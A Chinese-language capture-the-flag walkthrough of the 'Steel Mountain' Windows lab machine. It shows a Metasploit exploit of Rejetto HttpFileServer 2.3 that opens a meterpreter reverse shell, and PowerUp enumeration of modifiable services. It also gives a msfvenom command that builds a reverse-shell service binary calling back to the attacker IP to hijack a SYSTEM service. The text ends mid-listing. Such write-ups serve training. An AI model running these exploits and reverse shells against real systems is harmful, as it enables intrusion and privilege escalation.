【靶机】Windows渗透初体验-Steel Mountain

Steel Mountain

前言

bilibili:Zacarx

www.zacarx.com

信息收集

nmap -p- -A IP

80，8080
#扫描端口，发现8080，看到其服务为HttpFileServer 2.3

┌──(zacarx㉿zacarx)-[~]
└─$ dirb http://10.10.120.68/                                                      

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Oct 26 14:07:07 2022
URL_BASE: http://10.10.120.68/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.120.68/ ----
==> DIRECTORY: http://10.10.120.68/img/                                                                        
+ http://10.10.120.68/index.html (CODE:200|SIZE:772)                                                           
                                                                                                               
---- Entering directory: http://10.10.120.68/img/ ----
...

┌──(zacarx㉿zacarx)-[~]
└─$ searchsploit HttpFileServer 2.3
------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                        |  Path
------------------------------------------------------------------------------------------------------ ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)                                           | windows/webapps/49125.py
------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
...

┌──(zacarx㉿zacarx)-[~]
└─$ searchsploit -p 49125          
  Exploit: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
      URL: https://www.exploit-db.com/exploits/49125
     Path: /usr/share/exploitdb/exploits/windows/webapps/49125.py
File Type: Python script, Unicode text, UTF-8 text executable
.......

漏洞利用

msf6 > search HttpFileServer 2.3

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec


msf6 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machin
                                         e or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.107    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(windows/http/rejetto_hfs_exec) > set rhosts 10.10.120.68
rhosts => 10.10.120.68
msf6 exploit(windows/http/rejetto_hfs_exec) > set rport 8080
rport => 8080
msf6 exploit(windows/http/rejetto_hfs_exec) > set Lhost 10.17.0.91
Lhost => 10.17.0.91
msf6 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.17.0.91:4444 
[*] Using URL: http://10.17.0.91:8080/rO38EVW
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /rO38EVW
[*] Sending stage (175686 bytes) to 10.10.120.68
sessions 1
^C[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\YcIgpZ.vbs' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/rejetto_hfs_exec) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : STEELMOUNTAIN
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >  getuid
Server username: STEELMOUNTAIN\bill

meterpreter > cd C:\\
meterpreter > ls
Listing: C:\
============

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
040777/rwxrwxrwx  0        dir   2019-09-26 22:11:25 +0800  $Recycle.Bin
100666/rw-rw-rw-  1        fil   2013-06-18 20:18:29 +0800  BOOTNXT
040777/rwxrwxrwx  0        dir   2013-08-22 22:48:41 +0800  Documents and Settings
100666/rw-rw-rw-  3162859  fil   2020-10-13 03:06:12 +0800  EC2-Windows-Launch.zip
040777/rwxrwxrwx  0        dir   2013-08-22 23:52:33 +0800  PerfLogs
040555/r-xr-xr-x  4096     dir   2019-09-30 08:42:46 +0800  Program Files
040777/rwxrwxrwx  4096     dir   2019-09-30 08:46:20 +0800  Program Files (x86)
040777/rwxrwxrwx  4096     dir   2019-09-30 08:47:36 +0800  ProgramData
040777/rwxrwxrwx  0        dir   2019-09-26 22:04:30 +0800  System Volume Information
040555/r-xr-xr-x  4096     dir   2019-09-27 14:29:03 +0800  Users
040777/rwxrwxrwx  24576    dir   2020-10-13 03:09:13 +0800  Windows
100444/r--r--r--  398356   fil   2014-03-22 02:49:49 +0800  bootmgr
040777/rwxrwxrwx  0        dir   2019-09-26 22:17:28 +0800  inetpub
100666/rw-rw-rw-  13182    fil   2020-10-13 03:06:12 +0800  install.ps1
000000/---------  0        fif   1970-01-01 08:00:00 +0800  pagefile.sys

meterpreter > cd Users
meterpreter > ls
Listing: C:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  8192  dir   2019-09-26 22:11:25 +0800  Administrator
040777/rwxrwxrwx  0     dir   2013-08-22 22:48:41 +0800  All Users
040555/r-xr-xr-x  8192  dir   2014-03-22 03:18:16 +0800  Default
040777/rwxrwxrwx  0     dir   2013-08-22 22:48:41 +0800  Default User
040555/r-xr-xr-x  4096  dir   2013-08-22 23:39:32 +0800  Public
040777/rwxrwxrwx  8192  dir   2019-09-28 00:09:05 +0800  bill
100666/rw-rw-rw-  174   fil   2013-08-22 23:37:57 +0800  desktop.ini

meterpreter > cd ./bill
meterpreter > ls
Listing: C:\Users\bill
======================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:24 +0800  .groovy
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  AppData
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  Application Data
040555/r-xr-xr-x  0        dir   2019-09-27 19:07:07 +0800  Contacts
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  Cookies
040555/r-xr-xr-x  0        dir   2019-09-28 00:08:24 +0800  Desktop
040555/r-xr-xr-x  4096     dir   2019-09-27 19:07:07 +0800  Documents
040555/r-xr-xr-x  0        dir   2019-09-27 19:07:07 +0800  Downloads
040555/r-xr-xr-x  0        dir   2019-09-27 19:07:07 +0800  Favorites
040555/r-xr-xr-x  0        dir   2019-09-27 19:07:07 +0800  Links
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  Local Settings
040555/r-xr-xr-x  0        dir   2019-09-27 19:07:07 +0800  Music
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  My Documents
100666/rw-rw-rw-  524288   fil   2020-10-13 03:12:47 +0800  NTUSER.DAT
100666/rw-rw-rw-  1048576  fil   2019-09-28 00:09:04 +0800  NTUSER.DAT{3a3c0ba1-b123-11e3-80ba-a4badb27b52d}.TxR.0.regtrans-ms
100666/rw-rw-rw-  1048576  fil   2019-09-28 00:09:05 +0800  NTUSER.DAT{3a3c0ba1-b123-11e3-80ba-a4badb27b52d}.TxR.1.regtrans-ms
100666/rw-rw-rw-  1048576  fil   2019-09-28 00:09:05 +0800  NTUSER.DAT{3a3c0ba1-b123-11e3-80ba-a4badb27b52d}.TxR.2.regtrans-ms
100666/rw-rw-rw-  65536    fil   2019-09-28 00:09:04 +0800  NTUSER.DAT{3a3c0ba1-b123-11e3-80ba-a4badb27b52d}.TxR.blf
100666/rw-rw-rw-  65536    fil   2019-09-27 14:29:12 +0800  NTUSER.DAT{3a3c0ba2-b123-11e3-80ba-a4badb27b52d}.TM.blf
100666/rw-rw-rw-  524288   fil   2019-09-27 14:29:12 +0800  NTUSER.DAT{3a3c0ba2-b123-11e3-80ba-a4badb27b52d}.TMContainer00000000000000
                                                            000001.regtrans-ms
100666/rw-rw-rw-  524288   fil   2019-09-27 14:29:12 +0800  NTUSER.DAT{3a3c0ba2-b123-11e3-80ba-a4badb27b52d}.TMContainer00000000000000
                                                            000002.regtrans-ms
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  NetHood
040555/r-xr-xr-x  0        dir   2019-09-27 19:07:07 +0800  Pictures
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  PrintHood
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  Recent
040555/r-xr-xr-x  0        dir   2019-09-27 19:07:07 +0800  Saved Games
040555/r-xr-xr-x  0        dir   2019-09-27 19:07:07 +0800  Searches
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  SendTo
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  Start Menu
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  Templates
040555/r-xr-xr-x  0        dir   2019-09-27 19:07:07 +0800  Videos
100666/rw-rw-rw-  483328   fil   2019-09-27 14:29:03 +0800  ntuser.dat.LOG1
100666/rw-rw-rw-  77824    fil   2019-09-27 14:29:03 +0800  ntuser.dat.LOG2
100666/rw-rw-rw-  20       fil   2019-09-27 14:29:03 +0800  ntuser.ini


meterpreter > cd C:\\Users\\bill\\Desktop
meterpreter > ls
Listing: C:\Users\bill\Desktop
==============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2019-09-27 19:07:07 +0800  desktop.ini
100666/rw-rw-rw-  70    fil   2019-09-27 20:42:38 +0800  user.txt

meterpreter > cat user.txt
��b04763b6fcf51fcd7c13abc7db4fd365

提权

我们下载文件https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

并上传到靶机

输入powershell_shell 回车

然后运行PowerUp.ps1

PS > . .\PowerUp.ps1
PS > Invoke-AllChecks


ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit; IdentityReference=STEELMOUNTAIN\bill;
                 Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe;
                 IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

ServiceName    : AWSLiteAgent
Path           : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart     : False
Name           : AWSLiteAgent
Check          : Unquoted Service Paths

ServiceName    : AWSLiteAgent
Path           : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart     : False
Name           : AWSLiteAgent
Check          : Unquoted Service Paths

ServiceName    : IObitUnSvr
Path           : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart     : False
Name           : IObitUnSvr
Check          : Unquoted Service Paths

ServiceName    : IObitUnSvr
Path           : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart     : False
Name           : IObitUnSvr
Check          : Unquoted Service Paths

ServiceName    : IObitUnSvr
Path           : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit; IdentityReference=STEELMOUNTAIN\bill;
                 Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart     : False
Name           : IObitUnSvr
Check          : Unquoted Service Paths

ServiceName    : IObitUnSvr
Path           : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe;
                 IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart     : False
Name           : IObitUnSvr
Check          : Unquoted Service Paths

ServiceName    : LiveUpdateSvc
Path           : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart     : False
Name           : LiveUpdateSvc
Check          : Unquoted Service Paths

ServiceName    : LiveUpdateSvc
Path           : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart     : False
Name           : LiveUpdateSvc
Check          : Unquoted Service Paths

ServiceName    : LiveUpdateSvc
Path           : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe;
                 IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart     : False
Name           : LiveUpdateSvc
Check          : Unquoted Service Paths

ServiceName                     : AdvancedSystemCareService9
Path                            : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFile                  : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFilePermissions       : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'AdvancedSystemCareService9'
CanRestart                      : True
Name                            : AdvancedSystemCareService9
Check                           : Modifiable Service Files

ServiceName                     : IObitUnSvr
Path                            : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiableFile                  : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiableFilePermissions       : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'IObitUnSvr'
CanRestart                      : False
Name                            : IObitUnSvr
Check                           : Modifiable Service Files

ServiceName                     : LiveUpdateSvc
Path                            : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiableFile                  : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiableFilePermissions       : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'LiveUpdateSvc'
CanRestart                      : False
Name                            : LiveUpdateSvc
Check                           : Modifiable Service Files

我们看到AdvancedSystemCareService9可以进行重启操作

ServiceName                     : AdvancedSystemCareService9
Path                            : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFile                  : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFilePermissions       : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'AdvancedSystemCareService9'
CanRestart                      : True
Name                            : AdvancedSystemCareService9
Check                           : Modifiable Service Files

因此，我们可以上传一个可执行的反向shell文件，并替换原本的文件这样就可以拿到root权限

操作如下：

我们先生成一个文件

msfvenom -p windows/shell_reverse_tcp LHOST=10.17.0.91 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe

然后访问源文件地址

meterpreter > cd Program\ Files\ (x86)
meterpreter > ls
Listing: C:\Program Files (x86)
===============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  0     dir   2019-09-26 23:17:46 +0800  Common Files
040777/rwxrwxrwx  0     dir   2019-09-26 23:17:48 +0800  IObit
040777/rwxrwxrwx  4096  dir   2014-03-22 03:08:30 +0800  Internet Explorer
040777/rwxrwxrwx  0     dir   2013-08-22 23:39:30 +0800  Microsoft.NET
040777/rwxrwxrwx  0     dir   2019-09-30 08:46:20 +0800  Uninstall Information
040777/rwxrwxrwx  0     dir   2013-08-22 23:39:33 +0800  Windows Mail
040777/rwxrwxrwx  0     dir   2013-08-22 23:39:30 +0800  Windows NT
040777/rwxrwxrwx  0     dir   2013-08-22 23:39:30 +0800  WindowsPowerShell
100666/rw-rw-rw-  174   fil   2013-08-22 23:37:57 +0800  desktop.ini

meterpreter > cd IObit
meterpreter > ls
Listing: C:\Program Files (x86)\IObit
=====================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
040777/rwxrwxrwx  32768  dir   2022-10-26 14:03:29 +0800  Advanced SystemCare
040777/rwxrwxrwx  16384  dir   2019-09-27 13:35:24 +0800  IObit Uninstaller
040777/rwxrwxrwx  4096   dir   2019-09-26 23:18:50 +0800  LiveUpdate

meterpreter > cd Program\ Files\ (x86)
meterpreter > ls
Listing: C:\Program Files (x86)
===============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  0     dir   2019-09-26 23:17:46 +0800  Common Files
040777/rwxrwxrwx  0     dir   2019-09-26 23:17:48 +0800  IObit
040777/rwxrwxrwx  4096  dir   2014-03-22 03:08:30 +0800  Internet Explorer
040777/rwxrwxrwx  0     dir   2013-08-22 23:39:30 +0800  Microsoft.NET
040777/rwxrwxrwx  0     dir   2019-09-30 08:46:20 +0800  Uninstall Information
040777/rwxrwxrwx  0     dir   2013-08-22 23:39:33 +0800  Windows Mail
040777/rwxrwxrwx  0     dir   2013-08-22 23:39:30 +0800  Windows NT
040777/rwxrwxrwx  0     dir   2013-08-22 23:39:30 +0800  WindowsPowerShell
100666/rw-rw-rw-  174   fil   2013-08-22 23:37:57 +0800  desktop.ini



meterpreter > cd Advanced\ SystemCare
meterpreter > ls
Listing: C:\Program Files (x86)\IObit\Advanced SystemCare
=========================================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100777/rwxrwxrwx  5091616  fil   2016-08-17 02:03:56 +0800  ASC.exe
100777/rwxrwxrwx  691488   fil   2015-12-29 04:48:34 +0800  ASCDownload.exe
100666/rw-rw-rw-  166176   fil   2015-12-29 04:47:32 +0800  ASCExtMenu.dll
100666/rw-rw-rw-  187680   fil   2015-12-29 04:47:30 +0800  ASCExtMenu_64.dll
100777/rwxrwxrwx  574240   fil   2016-03-04 08:16:34 +0800  ASCInit.exe
100666/rw-rw-rw-  743      fil   2019-09-26 23:17:50 +0800  ASCInit.log
100777/rwxrwxrwx  452384   fil   2016-07-26 01:01:08 +0800  ASCService.exe
100666/rw-rw-rw-  104270   fil   2022-10-26 15:12:56 +0800  ASCService.log
040777/rwxrwxrwx  0        dir   2019-09-26 23:17:49 +0800  ASCServiceLog
100777/rwxrwxrwx  2023712  fil   2016-07-28 02:24:22 +0800  ASCTray.exe
100777/rwxrwxrwx  555808   fil   2015-12-29 05:06:42 +0800  ASCUpgrade.exe
100777/rwxrwxrwx  2400528  fil   2019-09-26 23:18:22 +0800  ASCVER.exe
100777/rwxrwxrwx  599328   fil   2015-12-29 04:48:46 +0800  AUpdate.exe
100666/rw-rw-rw-  64800    fil   2015-12-29 04:48:24 +0800  About.dll
100777/rwxrwxrwx  310560   fil   2016-07-28 02:24:20 +0800  About.exe
100666/rw-rw-rw-  21506    fil   2019-09-26 23:18:14 +0800  ActionCenter2.log
100777/rwxrwxrwx  2254624  fil   2016-01-08 09:13:48 +0800  ActionCenterDownloader.exe
100777/rwxrwxrwx  1917728  fil   2016-04-30 02:12:38 +0800  AutoCare.exe
100777/rwxrwxrwx  191264   fil   2015-12-29 04:52:24 +0800  AutoReactivator.exe
100777/rwxrwxrwx  1194784  fil   2016-04-30 02:12:40 +0800  AutoSweep.exe
100777/rwxrwxrwx  1403680  fil   2016-07-21 00:15:38 +0800  AutoUpdate.exe
100666/rw-rw-rw-  18536    fil   2019-09-27 16:32:33 +0800  AutoUpdate.log
040777/rwxrwxrwx  0        dir   2019-09-26 23:17:46 +0800  Backup
100777/rwxrwxrwx  1063200  fil   2016-03-08 02:14:22 +0800  BrowserCleaner.exe
100666/rw-rw-rw-  131872   fil   2016-07-21 00:15:42 +0800  CPUIDInterface.dll
040777/rwxrwxrwx  0        dir   2019-09-26 23:17:42 +0800  Config
100777/rwxrwxrwx  451872   fil   2015-12-29 04:49:22 +0800  DNSProtect.exe
100777/rwxrwxrwx  513528   fil   2016-04-13 04:10:24 +0800  Dashlane_Launcher.exe
040777/rwxrwxrwx  8192     dir   2019-09-26 23:17:51 +0800  Database
100777/rwxrwxrwx  2172704  fil   2016-05-07 00:50:26 +0800  DefaultProgram.exe
100666/rw-rw-rw-  11220    fil   2016-02-23 02:18:02 +0800  DetectionEx.ini
100777/rwxrwxrwx  438560   fil   2016-01-12 04:30:04 +0800  DiskDefrag.exe
100666/rw-rw-rw-  607520   fil   2015-12-29 04:49:12 +0800  DiskMap.dll
100666/rw-rw-rw-  127776   fil   2016-07-21 00:15:44 +0800  DiskScan.dll
100777/rwxrwxrwx  72992    fil   2015-12-29 04:49:16 +0800  DiskScan.exe
100777/rwxrwxrwx  110368   fil   2016-01-12 09:54:36 +0800  Display.exe
100666/rw-rw-rw-  586      fil   2022-10-26 14:03:06 +0800  Display_log.txt
100666/rw-rw-rw-  14716    fil   2013-07-20 09:31:32 +0800  DownloadApplication.xml
100666/rw-rw-rw-  81539    fil   2016-01-08 05:10:46 +0800  EULA.rtf
100777/rwxrwxrwx  1221408  fil   2016-07-21 00:15:46 +0800  FeedBack.exe
100666/rw-rw-rw-  454432   fil   2015-12-29 05:06:54 +0800  FfSweep.dll
100777/rwxrwxrwx  4939536  fil   2019-09-26 23:18:20 +0800  FreeBigupgrade1211.exe
100777/rwxrwxrwx  1019680  fil   2015-12-29 05:10:30 +0800  Homepage.exe
100666/rw-rw-rw-  750880   fil   2016-01-21 09:23:28 +0800  HomepageSvc.dll
100666/rw-rw-rw-  387360   fil   2016-03-04 04:21:28 +0800  ICONPIN32.dll
100777/rwxrwxrwx  380192   fil   2016-03-04 04:21:30 +0800  ICONPIN32.exe
100666/rw-rw-rw-  614176   fil   2016-03-04 04:21:34 +0800  ICONPIN64.dll
100777/rwxrwxrwx  582944   fil   2016-03-04 04:21:36 +0800  ICONPIN64.exe
100777/rwxrwxrwx  9474336  fil   2016-07-09 05:42:24 +0800  IObitUninstaller.exe
100666/rw-rw-rw-  899872   fil   2016-07-21 00:15:50 +0800  InfoHelp.dll
100777/rwxrwxrwx  21280    fil   2016-03-10 07:56:44 +0800  Iobit_RefreshTaskBar.exe
100666/rw-rw-rw-  15       fil   2014-07-23 05:15:36 +0800  Lang.dat
040777/rwxrwxrwx  8192     dir   2019-09-26 23:17:42 +0800  Language
040777/rwxrwxrwx  4096     dir   2019-09-26 23:18:19 +0800  LatestNews
040777/rwxrwxrwx  4096     dir   2019-09-26 23:17:45 +0800  LinkImages
100777/rwxrwxrwx  2960672  fil   2016-07-21 00:15:54 +0800  LiveUpdate.exe
100666/rw-rw-rw-  768      fil   2019-09-26 23:17:49 +0800  LiveUpdate.log
100777/rwxrwxrwx  667424   fil   2015-12-29 04:49:32 +0800  LocalLang.exe
100777/rwxrwxrwx  1530656  fil   2016-07-21 00:15:56 +0800  Monitor.exe
100777/rwxrwxrwx  533792   fil   2015-12-29 04:49:38 +0800  MonitorDisk.exe
100777/rwxrwxrwx  2111776  fil   2016-04-30 02:12:52 +0800  MyWin10.exe
100777/rwxrwxrwx  569632   fil   2016-07-23 01:20:00 +0800  Nfeatures.exe
100777/rwxrwxrwx  116000   fil   2015-12-29 04:49:40 +0800  NoteIcon.exe
100666/rw-rw-rw-  48416    fil   2015-12-29 04:49:44 +0800  NtfsData.dll
100666/rw-rw-rw-  784160   fil   2016-07-21 00:16:04 +0800  OFCommon.dll
100777/rwxrwxrwx  918816   fil   2016-07-21 00:16:06 +0800  PPUninstaller.exe
100666/rw-rw-rw-  70432    fil   2015-12-29 04:49:52 +0800  PowerConfig.dll
100666/rw-rw-rw-  629536   fil   2015-12-29 04:49:58 +0800  ProductStatistics.dll
100777/rwxrwxrwx  1044256  fil   2016-07-28 02:24:26 +0800  QuickSettings.exe
100777/rwxrwxrwx  152352   fil   2015-12-29 04:50:18 +0800  ReProcess.exe
100777/rwxrwxrwx  719648   fil   2015-12-29 04:50:02 +0800  RealTimeProtector.exe
100777/rwxrwxrwx  2052896  fil   2016-05-10 04:22:08 +0800  Register.exe
100777/rwxrwxrwx  1094944  fil   2016-07-28 02:24:28 +0800  Reinforce.exe
100666/rw-rw-rw-  1406     fil   2019-09-26 23:18:14 +0800  Reinforce.log
100777/rwxrwxrwx  490272   fil   2016-01-05 05:44:00 +0800  Report.exe
100777/rwxrwxrwx  1723680  fil   2016-07-21 09:07:08 +0800  RescueCenter.exe
100777/rwxrwxrwx  1326504  fil   2015-12-26 03:55:20 +0800  SPInit.exe
100777/rwxrwxrwx  8383688  fil   2016-07-29 01:07:04 +0800  SPSetup.exe
100666/rw-rw-rw-  783136   fil   2015-12-29 04:45:54 +0800  SPUrlScanner.dll
100666/rw-rw-rw-  1293088  fil   2015-12-29 04:50:24 +0800  Scan.dll
100777/rwxrwxrwx  802592   fil   2016-04-27 05:00:24 +0800  ScreenShot.exe
100666/rw-rw-rw-  1024000  fil   2022-10-26 14:03:29 +0800  SecurityHoleScan.log
100777/rwxrwxrwx  1887520  fil   2016-07-21 00:16:18 +0800  SendBugReportNew.exe
100777/rwxrwxrwx  1720096  fil   2016-01-12 04:30:12 +0800  SoftUpdateTip.exe
100666/rw-rw-rw-  202      fil   2019-09-26 23:18:13 +0800  SpeedUp.log
100777/rwxrwxrwx  897824   fil   2015-12-29 04:50:46 +0800  StartupInfo.exe
100777/rwxrwxrwx  2630944  fil   2016-07-28 02:26:32 +0800  Suc11_RegistryCleaner.exe
100777/rwxrwxrwx  1179936  fil   2016-07-21 00:30:20 +0800  Suc12_DiskCleaner.exe
100777/rwxrwxrwx  561440   fil   2016-01-06 09:47:42 +0800  Suo10_SmartRAM.exe
100777/rwxrwxrwx  1767712  fil   2016-07-21 00:30:26 +0800  Suo11_InternetBooster.exe
100777/rwxrwxrwx  4190496  fil   2016-07-21 00:30:28 +0800  Suo12_StartupManager.exe
100777/rwxrwxrwx  1421088  fil   2016-05-07 00:50:38 +0800  Sur13_WinFix.exe
100666/rw-rw-rw-  82720    fil   2015-12-29 04:50:48 +0800  SysRest.dll
100777/rwxrwxrwx  607520   fil   2015-12-29 04:50:50 +0800  TaskHelper.exe
040777/rwxrwxrwx  8192     dir   2019-09-26 23:17:42 +0800  Toolbox_Language
